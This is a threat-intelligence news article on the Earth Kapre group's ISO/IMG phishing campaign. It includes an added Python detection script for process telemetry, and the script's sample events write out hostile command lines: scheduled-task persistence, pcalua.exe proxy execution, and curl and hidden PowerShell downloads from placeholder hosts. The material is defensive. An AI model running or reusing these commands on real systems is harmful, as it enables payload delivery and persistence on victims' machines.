Hackers Using Weaponized ISO & IMG Files to Attack Organizations


The notorious hacking group known as Earth Kapre, also referred to as RedCurl and Red Wolf, has been targeting organizations across the globe with weaponized ISO and IMG files.

Trend Micro's investigation, summarized below, details the tactics the group uses to infiltrate networks, evade detection, and exfiltrate sensitive data.

Earth Kapre’s operations have spanned across Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the United States.

The group initiates its attack through phishing emails containing malicious attachments in the form of .iso and .img files.

Once unsuspecting recipients open these files, the malware establishes a foothold in the system, setting the stage for data theft and espionage.


Malicious Attachments

Upon execution, these attachments trigger the creation of a scheduled task for persistence, ensuring the malware remains active within the compromised system.

Suspicious execution of scheduled tasks

This technique facilitates the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers operated by the attackers.

MDR Investigation

The Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted a thorough investigation into an incident involving numerous machines infected by the Earth Kapre downloader.

This malware was observed establishing connections with its C&C servers, hinting at a potential data theft scenario.

The investigation uncovered the use of legitimate tools such as Powershell.exe and curl.exe to download further malicious payloads, showcasing Earth Kapre’s sophisticated evasion techniques.

In a cunning move to blend into the network and evade detection, Earth Kapre exploited the Program Compatibility Assistant (pcalua.exe) to execute malicious command lines.

This approach allowed the group to operate under the radar, leveraging the trust associated with legitimate system tools to carry out their nefarious activities.
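The three behaviours described above (a scheduled task created for persistence, pcalua.exe used as a proxy to launch commands, and curl.exe or PowerShell fetching follow-on payloads) all leave traces in ordinary process-creation telemetry. The following is an added example, not code from the article or from Trend Micro, showing how a defender might triage such events. The event format, the sample events and the rule that treats any drive letter other than C: as a possibly mounted ISO/IMG volume are all assumptions constructed for this example; the `-a` switch of pcalua.exe is its documented way of launching a program.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed schema, modelled on Sysmon event 1)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumption for this example: Windows mounts an opened ISO/IMG as a new drive letter,
# so anything running from D:-Z: is worth a look. Production rules would instead
# correlate with the actual volume-mount event.
NON_SYSTEM_DRIVE_RE = re.compile(r"^[D-Z]:\\", re.IGNORECASE)
PS_DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile", "iwr ")


def classify_event(ev: ProcessEvent) -> list[str]:
    """Return the list of suspicious behaviours matched by one event (empty if none)."""
    findings: list[str] = []
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line.lower()

    if NON_SYSTEM_DRIVE_RE.match(ev.image) or NON_SYSTEM_DRIVE_RE.match(ev.parent_image):
        findings.append("execution from non-system volume (possible mounted ISO/IMG)")
    if img == "schtasks.exe" and "/create" in cmd:
        findings.append("scheduled task creation (persistence)")
    if img == "pcalua.exe" and re.search(r"\s-a\s", ev.command_line, re.IGNORECASE):
        findings.append("pcalua.exe proxy execution")
    if parent == "pcalua.exe":
        findings.append("child of pcalua.exe proxy execution")
    if img == "curl.exe" and URL_RE.search(ev.command_line):
        findings.append("curl.exe remote download")
    if img == "powershell.exe" and (URL_RE.search(cmd) or any(m in cmd for m in PS_DOWNLOAD_MARKERS)):
        findings.append("powershell download cradle")
    return findings


def triage(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map pid -> findings for every event that matched at least one rule."""
    result = {}
    for ev in events:
        hits = classify_event(ev)
        if hits:
            result[ev.pid] = hits
    return result


# Constructed sample events: one benign launch followed by a chain that mirrors the
# article's description (file run from a mounted image, task created, pcalua proxy,
# curl and PowerShell downloads). Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent(100, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ProcessEvent(200, r"E:\Invoice.exe", r"C:\Windows\explorer.exe", r"E:\Invoice.exe"),
    ProcessEvent(201, r"C:\Windows\System32\schtasks.exe", r"E:\Invoice.exe",
                 r'schtasks.exe /create /tn "Updater" /tr "C:\Users\Public\update.exe" /sc minute /mo 30'),
    ProcessEvent(202, r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\cmd.exe",
                 r"pcalua.exe -a C:\Users\Public\update.exe"),
    ProcessEvent(203, r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\pcalua.exe",
                 r"curl.exe -o C:\Users\Public\stage2.dll http://example.invalid/stage2"),
    ProcessEvent(204, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\Public\p.exe"'),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

Each rule on its own is noisy (administrators create scheduled tasks and run curl), so the useful signal is the chain: a process from a freshly mounted volume spawning schtasks.exe, followed by pcalua.exe proxying a downloader. In a real pipeline the per-pid findings would be joined on parent/child relationships before alerting.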

Data Theft Scenario

The investigation revealed a complex data theft scenario orchestrated by Earth Kapre.

The group employed a Python script to establish outbound communication and execute remote commands, indicating the use of the Impacket library for Windows network protocol interactions.

This activity points to a well-coordinated effort to exfiltrate data from the compromised organization.

Trend Vision One™ Execution Profile showing the downloaded Earth Kapre loader using “curl.exe”.

The Earth Kapre hacking group’s latest campaign underscores the ongoing and active threat posed by sophisticated cyber espionage actors.

Earth Kapre attack chain

By leveraging phishing emails with weaponized ISO and IMG files, the group has demonstrated its capability to infiltrate a wide range of organizations globally.

The use of legitimate tools for malicious purposes further highlights the group’s ingenuity in evading detection and achieving its objectives.

Organizations are urged to remain vigilant and employ advanced threat detection and response solutions to counter such sophisticated threats effectively.
